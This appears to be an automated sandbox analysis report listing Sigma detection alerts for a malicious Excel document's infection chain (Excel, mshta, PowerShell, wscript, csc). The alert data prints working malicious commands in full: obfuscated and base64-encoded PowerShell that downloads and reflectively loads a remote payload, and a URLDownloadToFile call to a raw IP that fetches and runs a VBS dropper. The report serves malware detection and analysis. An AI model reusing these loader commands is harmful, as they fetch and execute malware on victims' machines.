::UTF8.GetString( 0x1ce46:$b3: ::UTF8.GetString( 0x1d7b8:$b3: ::UTF8.GetString( 0x26191:$b3: ::UTF8.GetString( 0x325d8:$b3: ::UTF8.GetString( 0x330e5:$b3: ::UTF8.GetString( 0x33a65:$b3: ::UTF8.GetString(

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi

Sigma detected: File With Uncommon Extension Created By An Office Application

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3220, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgreatfeaturesreturnformebestthingsgivensoofar[1].hta

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3688, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , ProcessId: 4028, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 45.63.94.214, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4028, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgI

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3220, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3516, ProcessName: mshta.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3688, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , ProcessId: 4028, ProcessName: wscript.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3688, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline", ProcessId: 3928, ProcessName: csc.exe

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 54.150.207.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3220, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3688, TargetFilename: C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 45.63.94.214, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4028, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3220, Protocol: tcp, SourceIp: 54.150.207.131, SourceIsIpv6: false, SourcePort: 443

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3688, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" , ProcessId: 4028, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3688, TargetFilename: C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

